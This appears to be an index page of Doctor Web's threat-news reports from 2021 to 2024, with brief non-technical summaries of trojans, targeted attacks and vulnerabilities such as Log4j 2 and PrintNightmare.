Subscribe to our news Changelog
Study of a targeted attack on a Russian enterprise in the mechanical-engineering sector
In October 2023, Doctor Web was contacted by a Russian mechanical-engineering enterprise that suspected malware was on one of its computers. Our specialists investigated this incident and determined that the affected company had encountered a targeted attack. During this attack, malicious actors had sent phishing emails with an attachment containing the malicious program responsible for the initial system infection and installing other malicious instruments in the system.
11.03.2024 | Real-time threat news
Hidden crypto miner in pirated software makes cybercriminals rich at the expense of their victims
Doctor Web is reporting on an increase in cases of cryptocurrency-mining trojans being found hidden in pirated software that is available in Telegram and on some Internet sites.
15.01.2024 | Real-time threat news
Vulnerability in Openfire messaging software allows unauthorized access to compromised servers
Doctor Web is notifying users about the spread of malicious plugins for the Openfire messaging server. To date, more than 3,000 servers worldwide that have Openfire software installed on them have been affected by a vulnerability that lets hackers gain access to the file system and use the infected servers as part of a botnet.
25.09.2023 | Real-time threat news
The art of manipulation: fraudsters steal money with remote administration software for mobile devices
Doctor Web is reporting on the growing number of fraud cases involving remote desktop access applications. RustDesk is the most popular among attackers.
22.09.2023 | Real-time threat news
Android.Spy.Lydia trojans masquerade as an Iranian online trading platform
Doctor Web has detected new versions of the Android.Spy.Lydia trojans, which engage in a variety of spyware activities on infected Android devices and provide attackers with remote control capabilities to steal personal information and funds. Moreover, the trojans have a defense mechanism that checks whether they are being launched in an emulator or on a test device. In such cases, the trojans stop working.
13.09.2023 | Real-time threat news
Pandora's box is now open: the well-known Mirai trojan arrives in a new disguise to Android-based TV sets and TV boxes
Doctor Web has identified a family of Android.Pandora trojans that compromise Android devices, either during firmware updates or when applications for viewing pirated video content are installed. This backdoor inherited its advanced DDoS-attack capabilities from its ancestor, the well-known Linux.Mirai trojan.
06.09.2023 | Real-time threat news
Fruity trojan downloader performs multi-stage infection of Windows computers
Doctor Web has uncovered an attack on Windows users involving a modular downloader trojan dubbed Trojan.Fruity.1. With its help, threat actors can infect computers with different types of malware, depending on the attackers’ goals. To conceal an attack and increase the chances of it being successful, they use a variety of tricks. These include a multi-stage infection process for target systems, using harmless apps for launching components of the trojan, and trying to bypass anti-virus protection.
27.07.2023 | Real-time threat news
Doctor Web identifies pirated Windows builds with crypto stealer that penetrates EFI partition
Doctor Web has discovered a malicious clipper program in a number of unofficial Windows 10 builds that cybercriminals have been distributing via a torrent tracker. Dubbed Trojan.Clipper.231, this trojan app substitutes crypto wallet addresses in the clipboard with addresses provided by attackers. As of this moment, malicious actors have managed to steal cryptocurrency in an amount equivalent to about $19,000 US.
13.06.2023 | Real-time threat news
Android apps containing SpinOk module with spyware features installed over 421,000,000 times
Doctor Web discovered an Android software module with spyware functionality. It collects information on files stored on devices and is capable of transferring them to malicious actors. It can also substitute and upload clipboard contents to a remote server. Dubbed Android.Spy.SpinOk in accordance with Dr.Web classification, this module is distributed as a marketing SDK. Developers can embed it into all sorts of apps and games, including those available on Google Play.
29.05.2023 | Real-time threat news
Linux backdoor malware infects WordPress-based websites
Doctor Web has discovered a malicious Linux program that hacks websites based on a WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform. If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts. As a result, when users click on any area of an attacked page, they are redirected to other sites.
30.12.2022 | Real-time threat news
Android users risk falling victim to fraudsters during online job searches
Doctor Web is alerting users to the emergence of malicious Android apps that attackers have disguised as job-search software. Through these applications, fraudsters can collect their victims’ personal information and steal money from them using deceptive techniques.
21.11.2022 | Real-time threat news
Banking trojans disguised as shopping apps attack Malaysian Android users
Doctor Web reports on the discovery of banking trojan apps that target Malaysian users. Malicious actors distribute them as mobile shopping apps. Unlike many other bankers, these not only have icons and basic store names, but also work just like such apps in order to look more plausible and not trigger any suspicions. These trojans steal logins and passwords from accounts of online banking systems. They also hijack SMS containing mobile TANs and one-time passwords that are used to confirm transactions. Moreover, they steal victims’ personal information, including their date of birth and mobile phone and identity card numbers.
19.10.2022 | Real-time threat news
Doctor Web identifies attack on WhatsApp and WhatsApp Business messengers installed on counterfeit Android devices
Doctor Web reports that it has discovered backdoors in the system partition of budget Android device models that are counterfeit versions of famous brand-name models. These trojans target arbitrary code execution in the WhatsApp and WhatsApp Business messaging apps and can potentially be used in different attack scenarios. Among them is the interception of chats and the theft of the confidential information that could be found in them; this malware can also execute spam campaigns and various scam schemes. This, however, is not the only risk factor for users. The affected devices are claimed to have a modern and secure Android OS version installed on them. But, in reality, they are based on an obsolete version subject to multiple vulnerabilities.
22.08.2022 | Real-time threat news
Study of an APT attack on a telecommunications company in Kazakhstan
In October 2021, one of Kazakhstan’s telecommunication companies contacted Doctor Web, with suspicion of malware in the corporate network. During the first look, we found backdoors that were previously only used in targeted attacks. During the investigation, we also found out that the company’s internal servers had been compromised since 2019. For several years, Backdoor.PlugX.93 and BackDoor.Whitebird.30, the Fast Reverse Proxy (FRP) utilities, and RemCom have been the main attackers' tools.
24.03.2022 | Real-time threat news
Mobile device users’ cryptocurrency is at risk
Doctor Web warns on the spread of trojan apps designed to steal cryptocurrency from mobile device users. The malicious software hijacks secret seed phrases that give access to crypto wallets. Users of both Android devices and Apple smartphones are at risk.
21.03.2022 | Real-time threat news
Vulnerabilities in Log4j 2 threaten users
Concerning the dangerous vulnerabilities in the Log4j 2 logging library–CVE-2021-44228, CVE-2021-45046, CVE2021-4104, and CVE-2021-42550–Doctor Web is drawing users’ attention to the need to observe protective measures. The library is used for logging in Java projects and is part of the Apache Logging Project. Vulnerabilities allow attackers to execute arbitrary code on the system and cause a Denial of Service or disclose confidential information. Even though Apache has already released several patches, vulnerabilities may still be a danger.
27.12.2021 | Real-time threat news
«Doctor Web discovered vulnerabilities in children’s smart watches
30.11.2021 | Real-time threat news
New trojan detected on AppGallery app catalog
Doctor Web malware analysts discovered dozens of games on the AppGallery catalog that have an Android.Cynos.7.origin trojan built into them. This trojan is designed to collect users’ mobile phone numbers. At least 9.300.000 Android device owners have installed these dangerous games.
23.11.2021 | Real-time threat news
The Coper―a new Android banking trojan targeting Colombian users
Doctor Web warns of a newly discovered family of Android banking trojans dubbed Android.BankBot.Coper. The malicious apps have a modular architecture and a multi-stage infection mechanism. They also have several protective techniques helping them withstand removal attempts. That allows the trojans to stay active longer and perform more successful attacks. All known Coper banker trojan modifications target Colombian users to date. However, new versions targeting users from other countries are likely to emerge over time.
21.07.2021 | Real-time threat news
About protecting against break-ins via the Windows PrintNightmare vulnerability
In connection with the detection of critical Windows print spooler vulnerabilities in June—CVE-2021-1675 and CVE-2021-34527 (widely known as PrintNightmare)—Doctor Web is drawing users' attention to the need to observe protective measures. Despite the fact that Microsoft has now closed the vulnerabilities, CVE-2021-34527 continues to pose a threat, allowing attackers to penetrate a system and execute arbitrary code with elevated privileges (NT AUTHORITY\SYSTEM) if the user independently switches certain parameters in the Windows registry.
15.07.2021 | Real-time threat news
Android trojans steal Facebook users’ logins and passwords
Doctor Web’s malware analysts have discovered malicious apps on Google Play that steal Facebook users’ logins and passwords. These stealer trojans were spread as harmless software and were installed more than 5,856,010 times.
01.07.2021 | Real-time threat news
Trojan detected in APKPure Android app store client software
Doctor Web specialists have discovered a malicious functionality in APKPure—the official client application of the popular third-party Android app store. The trojan built into it downloads and installs various apps, including other malware, without users’ permission.
09.04.2021 | Real-time threat news
Malware found on the AppGallery app store for the first time
Doctor Web’s virus analysts have uncovered the first malware on AppGallery―the official app store from the Huawei Android device manufacturer. They turned out to be dangerous Android.Joker trojans that function primarily to subscribe users to premium mobile services. In total, our specialists discovered that 10 modifications of these trojans have found their way onto AppGallery, with more than 538,000 users having installed them.
07.04.2021 | Real-time threat news
Study of targeted attacks on Russian research institutes
02.04.2021 | Real-time threat news
Study of the Spyder modular backdoor for targeted attacks
In December 2020, the Doctor Web virus laboratory was contacted by a telecommunications company based in Central Asia after its employees discovered suspicious files on their corporate network. During the examination, our analysts extracted and studied a malicious sample, which turned out to be one of the backdoors used by the hacker group known as Winnti.
04.03.2021 | Real-time threat news
